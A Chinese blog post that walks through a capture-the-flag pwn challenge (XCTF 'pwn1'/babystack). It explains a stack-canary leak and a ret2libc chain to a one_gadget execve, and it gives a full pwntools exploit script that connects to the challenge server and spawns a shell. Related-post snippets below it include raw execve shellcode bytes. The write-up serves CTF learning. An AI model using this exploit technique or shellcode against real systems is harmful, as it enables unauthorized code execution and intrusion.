攻防世界pwn——pwn1

最新推荐文章于 2024-04-04 21:12:24 发布
最新推荐文章于 2024-04-04 21:12:24 发布
阅读量427 收藏
点赞数
分类专栏: PWN 文章标签: 安全 系统安全 ubuntu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62076255/article/details/128401849
版权

题目链接:攻防世界 (xctf.org.cn)

文件分析

只有地址随机化没开,canary开了,如果要栈溢出就需要找到方法泄露canary

 运行程序,是个简单的输入输出。然后就可以放到IDA里了

__int64 __fastcall main(int a1, char **a2, char **a3)
{
  int v3; // eax
  char s[136]; // [rsp+10h] [rbp-90h] BYREF
  unsigned __int64 v6; // [rsp+98h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stderr, 0LL, 2, 0LL);
  memset(s, 0, 0x80uLL);
  while ( 1 )
  {
    sub_4008B9();
    v3 = sub_400841();
    switch ( v3 )
    {
      case 2:
        puts(s);
        break;
      case 3:
        return 0LL;
      case 1:
        read(0, s, 0x100uLL);
        break;
      default:
        sub_400826("invalid choice");
        break;
    }
    sub_400826((const char *)&unk_400AE7);
  }
}

输入1的时候明显看到可以栈溢出。简单扫一下,没有现成的system,试一下能不能拼出来,ROPgadget找了一下,程序本身不行,只能从libc文件里下手

one_gadget libc-2.23.so

 下面找一下canary,从main里看到只有v6能放canary。存输入的数组s在[rbp-90h],v6在[rbp-8h],也就是偏移是88h。

构造rop链,首先是利用输入1和2的模块泄露canary的值,再利用puts打印put函数真实地址,从而计算出偏移,就可以调用execve

首先选一个上面找到的execve的地址0x45216,main的地址0x400908。还需要pop rdi; ret,地址在0x400a93,它可以将后面的写入的“put_got”作为第一个参数放入第一个参数寄存器rdi中,然后返回到我们写进去的“put_plt”让puts打印出其真实的地址,然后返回到写入的main地址

ROPgadget --binary ./babystack --only "pop|ret" | grep "rdi"

exp

from pwn import *

p=remote('61.147.171.105','60085')
elf=ELF("./babystack")
libc=ELF("./libc-2.23.so")
 
execve=0x45216
main_addr=0x400908
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
pop_rdi=0x0400a93
 
payload1='a'*0x88
p.sendlineafter(">> ","1")
p.sendline(payload1)
 
p.sendlineafter(">> ","2")
p.recvuntil('a'*0x88+'\n')
canary = u64(p.recv(7).rjust(8,'\x00')) #泄露出canary
 
payload2='a'*0x88+p64(canary)+p64(1)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
p.sendlineafter(">> ","1")
p.send(payload2)

p.sendlineafter(">> ","3")
puts_addr=u64(p.recv(8).ljust(8,'\x00')) #泄露出puts真实地址
 
execve_addr=puts_addr-(libc.symbols['puts']-execve) #计算偏移,利用偏移计算execve经ASLR保护后的地址
payload3='a'*0x88+p64(canary)+'a'*8+p64(execve_addr)

p.sendlineafter(">> ","1")
p.sendline(payload3)
p.sendlineafter(">> ","3")
p.interactive()

Lyrisฅ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界--pwn1
qq_73149934的博客
02-22 476
canary,ret2libc 注意:只能打通远端,且libc中的systembinsh没用,用onegadget打通,在用onegadget时,注意rax需要为0,通过汇编看出选择3.exit退出时rax清0,可以onegadget Exp she_i386_20=b"\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" she_amd64_30=b"\x48\x31\xd2\x48\xbb
攻防世界——pwn(1)
weixin_44319142的博客
04-08 2849
get_shell
pwn--攻防世界 pwn1
最新发布
A13837377363的博客
04-04 420
canary一般是以'\x00'结尾,但是由于小端序存储,我们会先遇到'\x00',这里使用sendline自动添加的'\n'掩盖'\x00'。思路形成:先读出canary,再读出main函数的返回地址,计算出libc的基址,因为只能填入一个地址,所以就想到one_gadget。观察保护和源码,有canary保护,并且只能溢出8字节,也就是一个地址。我使用的是python3,可能由于python版本问题,我运行的时候要将。然后是读取main函数的返回地址,与这个类似,就不赘述。一个非常便捷的工具。
攻防世界 -pwn1
TedLau的博客
04-22 893
0x00 前言 首次做到跟canary绕过有关的知识,就准备写点东西记录下。 64位,保护几乎全开了。不慌,慌也没用。 0x10 分析 运行可以发现几个功能,就是说:1选项是保存你将要输入的内容,2就是打印你之前输入的内容,3就是退出。 0x11 ida分析 main函数 在main函数中发现了canary, canary的值在程序每一次运行都是会改...
攻防世界pwn难度1
weixin_63282980的博客
11-05 1607
攻防世界难度1的题目WP
攻防世界babystack(pwn1)——glibc_all_in_one初体验
weixin_48066554的博客
05-14 1317
攻防世界babystack(pwn1)——glibc_all_in_one初体验 文章目录攻防世界babystack(pwn1)——glibc_all_in_one初体验引入初步分析1、checksec2、伪代码分析3、栈分析解题思路1、泄露canary3、get shellexp本地libc运行尝试尝试1尝试2尝试3尝试4(重大进展) 引入 ​ 好久没做pwn题了,找了道简单的ret2libc做做,顺便尝试解决一些历史遗留问题 (其实就是让pwn题使用本地的libc的问题,省流:有突破性进展但没有完全解决
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc
攻防世界pwn题:forgot.doc
07-13
攻防世界pwn题:forgot.doc
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
Linux pwn入门教程(1)——栈溢出基础-0x01.rar
06-10
Linux pwn入门教程(1)——栈溢出基础
pwn1 一道pwn练习题
05-07
pwn练习题
pwn(1)-栈溢出(上)
qq_73667990的博客
06-08 760
0x7fffffffcb18和0x7ffffffffcb28中,再后面就是函数返回地址了。gets函数可以无限写入,把前面注满,就到了存储返回地址的地址,就可以改变返回地址。gdb调试到push操作esp会减少4,ebp不变,只改变栈顶。后面的3131就是输入1的填充结果,如果我们把这个地址填充成。栈的高地址在下低地址在上,先进入的数据压入栈底。要想修改返回地址,就要知道要溢出多少个字节。可以看到,他会提示你该返回地址不存在。我们把它输入到程序,可以看到地址被修改。运行到ret后,返回会main函数,
CTFshow PWN1
qq_60737948的博客
10-03 126
pwn开始的地方
第五届“强网”拟态防御之PWN1与近段时间对unlink的理解
Probeginner的博客
11-06 306
来个拟态防御简单一题
攻防世界base除4_攻防世界pwn新手训练
weixin_36310597的博客
12-24 550
小白刚开始接触pwn,做点新手训练了解一下pwn是干啥的。一开始啥漏洞都不知道,很多都是看别人的wp才知道要干嘛,比如才知道原来printf函数也是有漏洞的。 把这些题的思路和做法记录下来,不然我这鱼的记忆肯定过几天就又忘了get_shell题目描述:运行就能拿到shell呢,真的如题,nc连接,连接直接就是shell,直接cat flag就可以了。CGfsb题目描述:菜鸡面对着pringf发愁,...
pwn1_sctf_20161
m0_74091653的博客
09-25 185
函数相对安全,因为它可以限制读取的字符数,防止缓冲区溢出。但是可以发现会将输入的 I 换成 you。发现fgetsg函数 溢出0x3c。指向的字符数组中,直到遇到换行符。也就是我们可以用20个 I 来溢出。也找出了cat flag.txt。中读取字符,并将其存储在。这里我们正常溢出是不行的。
攻防世界-Pwn-new-easypwn
wuh2333的博客
03-12 2780
攻防世界-Pwn-new-easypwn
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1308
学习pwn开始,慢慢来不要急
pwn1
weixin_45427676的博客
04-09 381
首先在vm终端checksec一下查看一下pwn1的保护机制 可以看到有canary保护,canary是一种用来防护栈溢出的保护机制。其原理是在一个函数的入口处,先从fs/gs寄存器中取出一个4字节(eax)或者8字节(rax)的值存到栈上,当函数结束时会检查这个栈上的值是否和存进去的值一致,若一致则正常退出,如果是栈溢出或者其他原因导致canary的值发生变化,那么程序将执行___stack_...
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于repeater题目,根据引用中提供的代码,该题目涉及到了远程攻击和内存溢出的技术。代码中使用了pwn工具包来进行远程连接和漏洞利用。通过发送一段恶意输入,攻击者可以覆盖程序的返回地址,使得程序执行恶意的shellcode。 具体地说,代码中通过发送一系列的输入,包括恶意shellcode,使得程序发生内存溢出,覆盖了主函数的返回地址,从而让主函数正常退出,并跳转到shellcode的首条指令处。 在此过程中,使用了pwn工具包中的一些功能,如远程连接、编码shellcode等。代码中也展示了一些具体的操作步骤,如发送输入、计算地址等。 综上所述,攻防世界中的pwn和repeater题目分别涉及到了漏洞利用和内存溢出的技术。通过精心构造的输入,攻击者可以利用程序的漏洞来执行恶意代码。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值